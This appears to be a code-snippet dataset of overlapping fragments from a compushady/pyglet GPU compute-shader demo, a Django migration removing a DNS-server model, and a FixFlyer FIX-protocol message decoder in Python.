"HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; }; ConstantBuffer<Quad>",
"ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid :",
"SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"),",
"uav=[target]) x = 0 y = 0 def update(dt): global x, y x",
"def update(dt): global x, y x += 1 y += 1 if x",
"0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def",
"cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def update(dt): global x, y",
"'Windows': raise Exception('only Windows is supported for this example') window = pyglet.window.Window() swapchain",
"register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy",
"void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); }",
"{ uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target :",
"import hlsl if platform.system() != 'Windows': raise Exception('only Windows is supported for this",
"compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders",
"= pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen",
"clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID)",
"\"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def update(dt): global x,",
"if x > window.width: x = 0 if y > window.height: y =",
"@window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1, 1)",
"y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1,",
"RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy +",
"Windows is supported for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM,",
": register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0,",
"window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid",
"= 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height //",
"for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target =",
"supported for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target",
"float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad =",
"from compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only Windows is supported",
"y = 0 def update(dt): global x, y x += 1 y +=",
"window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM)",
"3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0);",
"= Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; }; ConstantBuffer<Quad> quad :",
"quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID)",
"1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0",
"Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target",
"window.width: x = 0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x,",
": SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer",
"= float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y",
"x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1,",
"platform.system() != 'Windows': raise Exception('only Windows is supported for this example') window =",
"1 y += 1 if x > window.width: x = 0 if y",
"struct Quad { uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4>",
"quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; }; ConstantBuffer<Quad> quad",
"update(dt): global x, y x += 1 y += 1 if x >",
"target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)]",
": SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); }",
"void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1,",
"Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows':",
"target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target])",
"> window.width: x = 0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II',",
"constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1)",
"Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy]",
"} \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad {",
"B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only Windows is",
"= 0 y = 0 def update(dt): global x, y x += 1",
"main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"),",
"main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1,",
"y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height",
"x > window.width: x = 0 if y > window.height: y = 0",
"Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system()",
"raise Exception('only Windows is supported for this example') window = pyglet.window.Window() swapchain =",
"is supported for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3)",
"pyglet import platform import struct from ctypes import addressof,pointer import ctypes from compushady",
"0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\"",
"global x, y x += 1 y += 1 if x > window.width:",
"window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8,",
"from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from",
"float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y =",
"platform import struct from ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD,",
": register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)]",
"x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)]",
"1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def",
"{ target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8,",
"ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer",
"y += 1 if x > window.width: x = 0 if y >",
"uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0);",
"= 0 def update(dt): global x, y x += 1 y += 1",
"}; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid",
"Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3",
"addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats",
"clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1, 1) swapchain.present(target) pyglet.clock.schedule_interval(update, 1/120.0)",
"[numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0,",
"= Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void",
"x, y x += 1 y += 1 if x > window.width: x",
"y x += 1 y += 1 if x > window.width: x ="
] |
[
"('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider',",
"Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from django.db import migrations",
"import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [",
"utf-8 -*- # Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__ import",
"by Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from django.db import",
"-*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2018-09-07 21:53 from",
"[ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip',",
"# Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from",
"] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider', ), migrations.DeleteModel(name='ProviderDNSServerIP',",
"= [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider', ), migrations.DeleteModel(name='ProviderDNSServerIP', ), ]",
"class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip',",
"operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider', ), migrations.DeleteModel(name='ProviderDNSServerIP', ),",
"Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from django.db",
"2018-09-07 21:53 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies",
"from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [",
"unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ]",
"Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]),",
"django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations =",
"= [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField(",
"migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether(",
"1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from django.db import migrations class",
"from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations",
"import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'),",
"'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider', ),",
"21:53 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies =",
"-*- # Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals",
"coding: utf-8 -*- # Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__",
"__future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core',",
"dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ),",
"# -*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2018-09-07 21:53",
"on 2018-09-07 21:53 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration):"
] |
[
"flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID:",
"(C) 2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\"",
"dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log",
"= getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log return if event_type",
"== flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type ==",
"receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if",
"flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log return",
"== flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type ==",
"#----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object):",
"listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos",
"self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg)",
"2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import",
"\"\\x01\") if msg_type < 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return",
"#FIXME: log return else: #FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self,",
"# Copyright (C) 2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #-----------------------------------------------------------------------",
"\"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self,",
"0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type ==",
"if pos < 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos",
"self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME:",
"All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\"",
"if msg_type < 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg)",
"= len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf =",
"def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER)",
"msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\")",
"= None self._buf = \"\" return def set_listener(self, listener): self._listener = listener return",
"return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return",
"= (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg):",
"def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success =",
"elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\",",
"def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\",",
"self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg):",
"return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg)",
"self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return def decode_payload_message(self, msg): return",
"#! /usr/bin/env python #----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. #",
"msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return",
"self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf =",
"pos < 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos +",
"flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if",
"= getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self,",
"event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\")",
"= self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self,",
"return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg",
"return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event)",
"self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type <",
"<gh_stars>1-10 #! /usr/bin/env python #----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC.",
"msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result ==",
"msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return def decode_error_message(self, msg):",
"elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif",
"listener): self._listener = listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return",
"== flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\")",
"event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type",
"flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE:",
"getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event",
"msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type",
"0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type ==",
"return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else:",
"else: #FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event =",
"MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf",
"return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id =",
"+= buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos < 0: return",
"== flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type ==",
"(result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return",
"self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\")",
"msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log return if",
"elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else:",
"elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log",
"event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type",
"#FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID:",
"< 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:]",
"msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def",
"< 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type",
"event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self,",
"flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return",
"self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result",
"msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg,",
"self._listener = None self._buf = \"\" return def set_listener(self, listener): self._listener = listener",
"\"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent()",
"/usr/bin/env python #----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All",
"def set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf, buflen): self._buf +=",
"return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return",
"flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID:",
"< 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type",
"Copyright (C) 2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol",
"\"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None",
"decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\"",
"def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return def",
"# COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER)",
"event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg):",
"log return else: #FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg):",
"return def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success",
"COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class",
"decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\" return def set_listener(self, listener):",
"buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos < 0: return msg",
"log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return",
"return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result =",
"len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\"",
"elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif",
"flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID:",
"else: #FIXME: log return else: #FIXME: log return def decode_payload_message(self, msg): return def",
"== flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return def",
"__init__(self): self._listener = None self._buf = \"\" return def set_listener(self, listener): self._listener =",
"MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type",
"= getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log return if msg_type",
"msg, \"\\x01\") if msg_type < 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE:",
"set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen]",
"event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return",
"#FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent()",
"pos = self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos + MARKER_LEN]",
"msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type",
"= \"\" return def set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf,",
"def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\",",
"getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log return if msg_type ==",
"rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN",
"class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\" return",
"MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type =",
"def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME:",
"return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type",
"reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN =",
"return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos =",
"msg, \"\\x01\") if event_type < 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID:",
"self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type =",
